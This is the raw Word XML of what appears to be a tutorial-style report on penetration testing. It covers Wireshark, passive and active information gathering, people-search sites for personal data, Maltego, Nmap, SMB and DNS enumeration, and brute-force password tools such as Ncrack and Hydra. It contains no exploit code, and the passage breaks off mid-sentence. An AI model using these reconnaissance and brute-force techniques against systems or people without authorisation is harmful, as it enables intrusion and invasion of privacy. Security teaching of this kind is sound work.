    <w:p w14:paraId="0FD57AC1" w14:textId="6E8FCED4" w:rsidR="00DA509E" w:rsidRPr="005711D1" w:rsidRDefault="00DA50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ersonal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tec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f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wnload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nlicens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companies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slightly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different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measures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take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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>personally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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2A34A0" w14:textId="737249F3" w:rsidR="0098280F" w:rsidRPr="005711D1" w:rsidRDefault="0098280F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yb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stant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nitor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vemen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xamin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cke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nknow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terven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mmediate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="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417EEA48" w14:textId="6B998683" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="00442042">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc72673314"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D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AD32DE" wp14:editId="00852593">
            <wp:extent cx="5760720" cy="43434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ADA3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82C1E" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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raffic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221155F0" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344B">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:left="540"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1AA644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2F693C85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73438E88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01BFFDE8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3D7C628E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67DDC10B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4143C393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5FB2AC8D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6492885E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6486749C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1534652F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161A6DC1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0EF14900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598A4E34" w14:textId="2CD094AD" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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Analysis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ireShark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raffic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n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A Simple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ay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29E70C7D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1FD6EAF5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F315A" wp14:editId="6F14FEF8">
            <wp:extent cx="5699760" cy="4923206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61" cy="49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080CA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</w:t>
      </w:r>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">*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Pr="005711D1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15597950" w14:textId="2676208A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* </w:t>
      </w:r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reShark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3865B0F" wp14:editId="245FF9FC">
            <wp:extent cx="6981777" cy="3680460"/>
            <wp:effectExtent l="0" t="0" r="0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625" cy="368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FA0D2" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B734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is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ulnerabil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Network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ministrator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os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tec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isk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351958F4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</w:p>
    <w:p w14:paraId="5F458A85" w14:textId="36250EF2" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc72673315"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gather </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Passive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="09DFFA1E" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344B">
      <w:pPr>
        <w:ind w:left="180"/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6007B" wp14:editId="2E4D308C">
            <wp:extent cx="5753100" cy="125730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B16A7" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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llect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arge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ublic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).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-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22F108FE" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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Active Informatio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ath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arge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tive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teract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nlik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uthoriz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be illegal. Can b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DN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numer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Por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O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ingerprint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imila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ath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ossib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13F2C9B9" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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ather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643182B1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</w:p>
    <w:p w14:paraId="5A6F9AE3" w14:textId="7C57F970" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc72673316"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Easy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0695E776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Critical Mail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e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11D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mail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cumen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ffordab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cure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do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a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postal service.com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il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isit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sit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11D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>confirm.to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E0BC7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bsit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llec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lot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query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site doma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heck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site.</w:t>
      </w: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C37BC" wp14:editId="21030F13">
            <wp:extent cx="4389120" cy="4563521"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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94" cy="46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B566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661556" wp14:editId="204D3805">
            <wp:extent cx="5753100" cy="4168140"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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9D74E" w14:textId="4D2EA4A5" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc72673317"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gathering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnformation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A45AF96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a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arch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"@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mainNam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" o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xamin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6E0F0B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D6ADEFF" wp14:editId="17F9CBE8">
            <wp:extent cx="5760720" cy="65532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F515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go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rivate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Pipl.com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zabasearch.com i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USA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E0989" w14:textId="73C2ADE2" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc72673318"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Maltego</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74609D9D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5105301" wp14:editId="3E4D3165">
            <wp:extent cx="3771900" cy="2213181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11" cy="222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8FDD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</w:rPr>
        <w:lastRenderedPageBreak/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arch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lteg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3A1AE6A1" w14:textId="547BEF7B" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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Using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Maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="350E840F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First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n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Movie Databas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08ECF790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26CB5FA" wp14:editId="0F8DF9D6">
            <wp:extent cx="4071380" cy="4389120"/>
            <wp:effectExtent l="0" t="0" r="571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03" cy="44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54B63B31" wp14:editId="6E09A655">
            <wp:extent cx="4661038" cy="3520440"/>
            <wp:effectExtent l="0" t="0" r="635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75" cy="352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0710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033EFB6D" wp14:editId="2240317B">
            <wp:extent cx="5783580" cy="3756660"/>
            <wp:effectExtent l="0" t="0" r="762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A9AF" w14:textId="203FED89" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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Relate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Entitie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n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Maltego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64BB733E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etwork. I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ot be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h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creensho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 am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0507CFA6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Personel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E-mail </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adres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0543BE0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9F9CC9C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70DF6" wp14:editId="709F4B6A">
            <wp:extent cx="4022253" cy="3116580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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25" cy="31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5EC1" w14:textId="6E66098B" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc72673319"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Active Information </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gathering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DDEE30A" w14:textId="5285D75B" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc72673320"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5AB8B0B3" w14:textId="77777777" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344B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  Since I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t as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root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 I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need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get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ministrator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permission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y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yping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“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udo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” at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eginning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de</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711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14:paraId="7A5FBA76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1D126D" wp14:editId="3858AF3F">
            <wp:extent cx="3035817" cy="320738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98" cy="323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12F3D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7E0F3" wp14:editId="098D94AF">
            <wp:extent cx="4085220" cy="432816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86" cy="43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B3F01" w14:textId="0964A33A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is a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vulnerabil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cann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network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iscover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Network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dministrator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iscov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vic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os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or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etec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risk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378CE467" w14:textId="729D8F7F" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="00B7344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Get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Mor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Detail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bout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Victim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3323117F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orge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m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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005711D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 x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005711D1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 –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m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how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m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2F2F3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m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660F4EDC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DBF37" wp14:editId="33ED58F4">
            <wp:extent cx="3716756" cy="3901440"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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799" cy="39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2E0D" w14:textId="191B1534" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc72673321"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP NSE SCRİPTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6960AAA5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337A566B" wp14:editId="77520F2D">
            <wp:extent cx="3280292" cy="3421380"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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909" cy="342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7AF2" w14:textId="69AEE590" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc72673322"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.3</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="019C6B30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install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zenmap.rpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68C8B8AC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1D160E" wp14:editId="50E3CF5B">
            <wp:extent cx="3713319" cy="3909060"/>
            <wp:effectExtent l="0" t="0" r="190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00" cy="391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18D14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etup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="746E2176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96BFB5" wp14:editId="084560F1">
            <wp:extent cx="3398520" cy="3529434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42" cy="35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ACF8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Zenmap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is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graphical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nterfac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nmap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n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ay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cces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5711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gram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w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looking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for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mor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clearly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easily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B267EBC" w14:textId="5FFAF934" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc72673323"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.4</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB ENUMERATİON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6ED8C790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8A4BD63" wp14:editId="66F2BCD2">
            <wp:extent cx="3855600" cy="38862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18" cy="38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D447" w14:textId="7F4D8C93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*  </w:t>
      </w:r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DNS ENUMERATİON</w:t>
      </w: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070F654" wp14:editId="68A6DA31">
            <wp:extent cx="4808220" cy="4754880"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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24A8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7B30465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0A33198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FB289A1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F56D788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1974191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2BB2441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A8CDF4A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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640D764C" wp14:editId="73801C0C">
            <wp:extent cx="4785360" cy="477012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C26A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92B1BC0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5D453EA" w14:textId="744EC302" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc72673324"/>
      <w:r w:rsidRPr="005711D1">
        <w:t>5.5</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:t>Enum4linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4DA41691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14C0DB6B" wp14:editId="5EF20E2F">
            <wp:extent cx="3087171" cy="3062708"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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70" cy="306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9B5C" w14:textId="2DE8A6FC" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00B7344B" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc72673325"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="39F5D99D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4B50DE36" wp14:editId="78698B51">
            <wp:extent cx="3688080" cy="2738730"/>
            <wp:effectExtent l="0" t="0" r="7620" b="508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21" cy="27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301B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044E01" w14:textId="29339357" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc72673326"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NC</w:t>
      </w:r>
      <w:r w:rsidR="00BB4B69" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="0B31602C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Ncrack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is an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dvance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ctiv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brut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force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ool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Thi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ttack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can be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carrie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out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via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Ncrack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It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lso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support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many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popular network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protocols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such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as SSH, RDP, HTTP (s), POP3 (s), FTP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  <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> telnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0043295E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711D1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4128A21" wp14:editId="5649D673">
            <wp:extent cx="4823460" cy="444246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A329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CFE3596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F5A8D9D" w14:textId="57740E75" w:rsidR="00B7344B" w:rsidRPr="005711D1" w:rsidRDefault="00442042" w:rsidP="005711D1">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc72673327"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.2</w:t>
      </w:r>
      <w:r w:rsidR="00B7344B" w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Xhydra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="5FF79CDF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lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">   Hydra, or "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>thc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005711D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">-hydra" as it is known, is a brute force password attack tool. You can use Hydra for brute-force attacks in services such as POSTGRES, </w:t>
